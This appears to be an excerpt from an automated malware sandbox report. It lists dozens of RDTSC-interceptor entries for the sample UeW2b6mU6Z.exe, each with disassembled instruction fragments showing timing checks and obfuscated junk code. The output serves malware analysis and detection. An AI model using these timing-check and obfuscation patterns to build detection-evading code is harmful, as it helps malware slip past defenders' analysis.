Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6AB07 second address: E6AB0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6ACDB second address: E6ACE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6BD91 second address: E6BD9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F17B0EA9AB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6B4B5 second address: E6B4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6B4B9 second address: E6B4BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6C8FA second address: E6C8FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6B4BD second address: E6B4DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F17B0EA9ABCh 0x0000000c jo 00007F17B0EA9AB6h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jbe 00007F17B0EA9AB6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6C8FE second address: E6C913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F17B0FD572Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6B4DB second address: E6B4E1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6C913 second address: E6C9B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FD5738h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F17B0FD5728h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 call 00007F17B0FD5731h 0x00000029 jmp 00007F17B0FD572Eh 0x0000002e pop edi 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007F17B0FD5728h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b push 00000000h 0x0000004d push edi 0x0000004e xor dword ptr [ebp+122D3228h], edx 0x00000054 pop esi 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F17B0FD5732h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E28E90 second address: E28EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17B0EA9AC2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E28EA8 second address: E28EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E28EB1 second address: E28EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E6EA6B second address: E6EA87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F17B0FD5736h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E72AA7 second address: E72AB2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007F17B0EA9AB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E758FB second address: E75905 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F17B0FD5726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E75905 second address: E7590B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7590B second address: E7591A instructions: 0x00000000 rdtsc 0x00000002 js 00007F17B0FD5726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E770D7 second address: E770DC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E770DC second address: E7713E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a pushad 0x0000000b jo 00007F17B0FD572Ch 0x00000011 sub dword ptr [ebp+122D2A06h], eax 0x00000017 cld 0x00000018 popad 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007F17B0FD5728h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 0000001Bh 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 mov dword ptr [ebp+122D57FEh], edi 0x0000003b mov dword ptr [ebp+122D2A88h], eax 0x00000041 push 00000000h 0x00000043 jmp 00007F17B0FD572Eh 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c push eax 0x0000004d pop eax 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7713E second address: E77143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E780F3 second address: E7815A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FD5735h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F17B0FD5728h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 nop 0x00000013 mov edi, dword ptr [ebp+122D2E87h] 0x00000019 push 00000000h 0x0000001b call 00007F17B0FD5730h 0x00000020 call 00007F17B0FD5734h 0x00000025 mov ebx, eax 0x00000027 pop ebx 0x00000028 pop edi 0x00000029 push 00000000h 0x0000002b mov di, ax 0x0000002e xchg eax, esi 0x0000002f push eax 0x00000030 push edx 0x00000031 jp 00007F17B0FD572Ch 0x00000037 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7815A second address: E78183 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F17B0EA9AC8h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7837D second address: E7838C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F17B0FD5726h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E79363 second address: E7936D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F17B0EA9ABCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7C0BA second address: E7C0C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7C0C0 second address: E7C0C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7C0C5 second address: E7C0E1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F17B0FD5728h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F17B0FD572Bh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7C0E1 second address: E7C0E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7C0E5 second address: E7C0EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7C0EB second address: E7C0F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7C0F1 second address: E7C0F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7C2A0 second address: E7C2A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E83658 second address: E83660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E83660 second address: E83664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E83664 second address: E8367D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jmp 00007F17B0FD572Dh 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E856E6 second address: E856F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E857F6 second address: E857FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E8B177 second address: E8B18A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F17B0EA9AB6h 0x0000000a pop edi 0x0000000b je 00007F17B0EA9AC9h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E8D81E second address: E8D871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jp 00007F17B0FD573Eh 0x0000000e jmp 00007F17B0FD572Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F17B0FD572Eh 0x0000001a jmp 00007F17B0FD572Eh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E8D871 second address: E8D875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E8D875 second address: E8D87B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E8E23B second address: E8E257 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9AC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E917A8 second address: E917AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E917AC second address: E917B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E917B0 second address: E917BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F17B0FD5726h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E90EFC second address: E90F08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E90F08 second address: E90F0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E90F0C second address: E90F1A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F17B0EA9AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E90F1A second address: E90F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E90F1E second address: E90F22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E910AC second address: E910CA instructions: 0x00000000 rdtsc 0x00000002 js 00007F17B0FD5726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F17B0FD5734h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E91336 second address: E9133C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E9133C second address: E91340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E91340 second address: E91350 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F17B0EA9ABAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E91350 second address: E91361 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jbe 00007F17B0FD5726h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop ebx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E95606 second address: E95610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F17B0EA9AB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E95610 second address: E95614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E9570B second address: E9570F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E9570F second address: E95725 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F17B0FD5726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F17B0FD572Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E95725 second address: E95729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E95729 second address: E95738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E95877 second address: E958CE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jl 00007F17B0EA9AB6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jg 00007F17B0EA9AC4h 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 jmp 00007F17B0EA9AC1h 0x0000001d push ecx 0x0000001e jne 00007F17B0EA9AB6h 0x00000024 pop ecx 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F17B0EA9AC2h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E958CE second address: E958D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E9C831 second address: E9C85C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9AC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F17B0EA9AC0h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E1ED07 second address: E1ED0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E9BBBF second address: E9BBDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9AC5h 0x00000007 jg 00007F17B0EA9ABEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E9BFE2 second address: E9BFE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E9C111 second address: E9C128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F17B0EA9AB6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jng 00007F17B0EA9AB6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E9C680 second address: E9C69D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F17B0FD5726h 0x0000000a popad 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F17B0FD572Eh 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E9C69D second address: E9C6B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17B0EA9AC7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA384E second address: EA3852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA3852 second address: EA3878 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9AC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F17B0EA9ABBh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA6FE8 second address: EA6FED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7394A second address: E7395F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9ABAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E73A81 second address: E73A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E73C47 second address: E73C4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E73C90 second address: E73CD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F17B0FD5731h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F17B0FD5728h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 xor dword ptr [ebp+12492BF3h], ebx 0x0000002e nop 0x0000002f push eax 0x00000030 push edx 0x00000031 push esi 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E73CD9 second address: E73CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E73CDE second address: E73CE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E73CE4 second address: E73CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E73DF2 second address: E73DF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E7465B second address: E746B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9AC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F17B0EA9AB8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov dl, 99h 0x00000026 lea eax, dword ptr [ebp+124980FEh] 0x0000002c sub dword ptr [ebp+122D3212h], ebx 0x00000032 nop 0x00000033 jp 00007F17B0EA9ABEh 0x00000039 push eax 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E746B9 second address: E746FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F17B0FD572Fh 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 sub ecx, 23B02D9Ah 0x00000017 lea eax, dword ptr [ebp+124980BAh] 0x0000001d jl 00007F17B0FD572Ch 0x00000023 mov edi, 3B8A1FCCh 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push ebx 0x0000002c jnl 00007F17B0FD5726h 0x00000032 pop ebx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E746FC second address: E4F722 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9AC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c js 00007F17B0EA9ABCh 0x00000012 mov dword ptr [ebp+122D327Bh], ebx 0x00000018 call dword ptr [ebp+122D324Eh] 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 ja 00007F17B0EA9AB6h 0x00000027 jmp 00007F17B0EA9AC4h 0x0000002c rdtsc
